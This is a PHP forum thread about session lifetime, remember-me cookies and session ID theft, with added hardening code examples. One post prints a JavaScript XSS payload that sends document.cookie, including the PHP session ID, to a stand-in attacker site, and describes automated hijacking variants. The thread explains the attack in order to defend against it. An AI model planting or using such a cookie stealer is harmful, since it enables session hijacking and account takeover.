Thread: Session Variables

  1. #1
    Join Date: Feb 2006 | Posts: 158

    Session Variables

    When you have a session going and you exit out of the window does the session automatically session_destroy()?

  2. #2
    Join Date: Jun 2005 | Location: United Kingdom | Posts: 11,878

    No, but if the browser considers itself to be closed it'll delete the cookie, which expires at the end of the browser session.
    Twey | I understand English | I understand Japanese | I understand Lojban | I understand Esperanto | I understand French | I understand Spanish | I understand a little Vietnamese | I understand a little German | beware XHTML | common coding mistakes | tutorials | various stuff | argh PHP!
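
    The point in the reply above, as an added example that is not part of the original thread: a browser-session cookie (lifetime 0) is discarded by the browser on close, but nothing tells the server, so the session data stays in session.save_path until garbage collection reaps it. The only deliberate teardown is a logout handler that clears the array, expires the cookie and calls session_destroy(). The example assumes PHP 7.3 or later (array form of session_set_cookie_params/setcookie), the default file-based session handler, and HTTPS for the secure flag; the user_id value is constructed sample data.

```php
<?php
// Added example (not from the original thread): what happens to a PHP session
// when the browser window is closed, and how to end it on purpose.
// Assumes PHP >= 7.3, the default file-based session handler, and HTTPS.

declare(strict_types=1);

// 1. The session cookie. lifetime 0 means "until the browser closes": the
//    browser discards the cookie, but no request is sent to the server, so the
//    serialized session data in session.save_path is untouched.
session_set_cookie_params([
    'lifetime' => 0,        // browser-session cookie, as described in the thread
    'path'     => '/',
    'secure'   => true,     // assumption: site served over HTTPS only
    'httponly' => true,     // keep the SID out of document.cookie
    'samesite' => 'Lax',
]);
session_start();
$_SESSION['user_id'] = 42;  // constructed sample data

// 2. Server side, the data lives until garbage collection removes entries older
//    than session.gc_maxlifetime (default 1440 s), and GC only runs with
//    probability gc_probability/gc_divisor on some later session_start().
$info = sprintf(
    "Session %s stored in %s, eligible for GC after %d s of inactivity\n",
    session_id(),
    session_save_path(),
    (int) ini_get('session.gc_maxlifetime')
);

// 3. An explicit logout is the only thing that destroys the session now.
function logout(): void
{
    // Empty the in-memory array first; session_destroy() does not unset it.
    $_SESSION = [];

    // Expire the cookie in the browser so the old SID is never sent again,
    // using the same path/domain/flags it was set with.
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'] ?? 'Lax',
        ]);
    }

    // Remove the server-side data for this session id.
    session_destroy();
}

logout();
echo $info;  // output deferred so the cookie header above can still be sent
```

    Note that session.cookie_lifetime only governs the browser's copy; raising gc_maxlifetime, or running a session handler with its own expiry, is what governs how long an abandoned session remains usable by anyone who holds its id.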

  3. #3
    Join Date: Feb 2006 | Posts: 158

    So that's why when you close the window without logging out other people aren't automatically logged on with your session variables?

  4. #4
    Join Date: Jun 2005 | Location: United Kingdom | Posts: 11,878

    That's right. Unless somebody steals your SID, they're not getting in. If you want to stop this effect, manually create a cookie to store the information.
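
    One way to do what the reply above suggests (a persistent cookie so the login survives a browser close), as an added example that is not part of the original thread. It goes a step beyond the post: rather than storing the login details themselves in the cookie, it stores a random selector/validator pair and keeps only a hash of the validator on the server, so a stolen or leaked cookie cannot be turned back into a password and a leaked table cannot be turned into cookies. The cookie name, the 30-day lifetime, the in-memory $rememberTokens array standing in for a database table, and the function names are all assumptions of this example; it assumes PHP 7.3 or later and HTTPS.

```php
<?php
// Added example (not from the original thread): a "remember me" cookie that
// outlives the browser session without carrying the username or password.
// Assumes PHP >= 7.3 and HTTPS. Storage is a constructed in-memory array.

declare(strict_types=1);

const REMEMBER_COOKIE = 'remember';   // assumed cookie name
const REMEMBER_DAYS   = 30;           // assumed lifetime

// Constructed stand-in for a database table:
//   selector => ['hash' => sha256(validator), 'user_id' => int, 'expires' => unix time]
$rememberTokens = [];

function issueRememberCookie(int $userId, array &$store): void
{
    $selector  = bin2hex(random_bytes(9));   // lookup key, safe to store in clear
    $validator = bin2hex(random_bytes(32));  // secret half, stored only as a hash
    $expires   = time() + REMEMBER_DAYS * 86400;

    $store[$selector] = [
        'hash'    => hash('sha256', $validator),
        'user_id' => $userId,
        'expires' => $expires,
    ];

    setcookie(REMEMBER_COOKIE, $selector . ':' . $validator, [
        'expires'  => $expires,   // a real expiry is what survives a browser close
        'path'     => '/',
        'secure'   => true,       // assumption: HTTPS only
        'httponly' => true,       // not readable via document.cookie
        'samesite' => 'Lax',
    ]);
}

// Returns the user id if the cookie is valid and logs the user in, null otherwise.
function redeemRememberCookie(?string $cookie, array &$store): ?int
{
    if ($cookie === null || substr_count($cookie, ':') !== 1) {
        return null;
    }
    [$selector, $validator] = explode(':', $cookie, 2);
    $row = $store[$selector] ?? null;
    if ($row === null || $row['expires'] < time()) {
        return null;
    }
    // Constant-time comparison so response timing does not leak the hash.
    if (!hash_equals($row['hash'], hash('sha256', $validator))) {
        unset($store[$selector]);   // valid selector, wrong secret: burn the token
        return null;
    }
    // Start the authenticated session under a fresh id and rotate the token,
    // so each cookie is single-use.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $row['user_id'];
    unset($store[$selector]);
    issueRememberCookie($row['user_id'], $store);
    return $row['user_id'];
}

session_start();
if (empty($_SESSION['user_id'])) {
    redeemRememberCookie($_COOKIE[REMEMBER_COOKIE] ?? null, $rememberTokens);
}
```

    The trade-off is the one the thread is circling: a persistent cookie is a second credential that sits on disk for 30 days, so it gets the same HttpOnly/Secure flags as the session cookie and is revoked (the stored row deleted) on logout or password change.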

  5. #5
    Join Date: Feb 2006 | Posts: 158

    But there's very little chance of somebody actually stealing an SID right? I mean, how easy can it be to figure out just one actual SID that's in use?

  6. #6
    Join Date: Jun 2005 | Location: United Kingdom | Posts: 11,878

    Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertently allows client-side scripting to be embedded in one of its pages. This could be something like this:
    Code:
    // Redirect the victim to the attacker's server with their cookies (including the PHP session ID) in the query string
    window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);
    When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, mitigating the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.
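
    The defensive side of the reply above, as an added example that is not part of the original thread: the session settings that keep the SID out of document.cookie and out of URLs, the id regeneration that makes a SID captured before login worthless, and the "enter your password again before changing vital data" check the post describes as standard forum behaviour. The function names, the five-minute re-authentication window, the sample password and the use of $_POST['password'] are assumptions of this example; it assumes PHP 7.4 or later and HTTPS.

```php
<?php
// Added example (not from the original thread): server-side hardening against
// the document.cookie stealer shown in the post. Assumes PHP >= 7.4 and HTTPS.

declare(strict_types=1);

// 1. Keep the SID where injected script cannot read it and where it cannot
//    leak through URLs or be chosen by the attacker (session fixation).
ini_set('session.cookie_httponly',  '1'); // PHPSESSID no longer appears in document.cookie
ini_set('session.cookie_secure',    '1'); // assumption: HTTPS only
ini_set('session.use_only_cookies', '1'); // never accept ?PHPSESSID=... from the URL
ini_set('session.use_strict_mode',  '1'); // reject session ids the server did not issue
session_start();

// 2. The root cause of the stealer is unescaped output; every user-supplied
//    value rendered into HTML goes through this.
function escapeHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 3. On login, swap the pre-login SID for a fresh one so a SID captured before
//    authentication (or planted by the attacker) is useless afterwards.
function onSuccessfulLogin(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']   = $userId;
    $_SESSION['auth_time'] = time();   // when the password was last entered
}

// 4. Sensitive actions require the password again unless it was entered
//    recently, so a hijacked session alone cannot change e-mail or password.
const REAUTH_WINDOW = 300; // seconds; assumed value

function requireRecentAuth(callable $verifyPassword, ?string $submittedPassword): bool
{
    $fresh = isset($_SESSION['auth_time'])
          && (time() - $_SESSION['auth_time']) < REAUTH_WINDOW;
    if ($fresh) {
        return true;
    }
    if ($submittedPassword !== null && $verifyPassword($submittedPassword)) {
        $_SESSION['auth_time'] = time();
        return true;
    }
    return false;
}

// Constructed stand-in for the real credential check (the hash would come from the DB).
$storedHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
$verify = fn(string $pw): bool => password_verify($pw, $storedHash);

onSuccessfulLogin(42);                   // constructed sample login
$_SESSION['auth_time'] = time() - 3600;  // simulate a login an hour ago

// Someone holding only a stolen SID reaches this point without the password:
if (!requireRecentAuth($verify, $_POST['password'] ?? null)) {
    http_response_code(403);
    echo escapeHtml('Re-enter your password to change account details.') . "\n";
    exit;
}
// ... proceed to change the e-mail address / password ...
```

    HttpOnly removes the SID from the stolen cookie string, but it does not stop the AJAX variant the post mentions: script running on the vulnerable page can still issue requests that ride on the victim's cookie. That is why the re-authentication gate and the output escaping matter more than the cookie flags alone.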

  7. #7
    Join Date: Feb 2006 | Posts: 158

    Wow. Intense. Well, considering what you just told me I think I'm just not going to worry about SID stealers.

    Thanks.
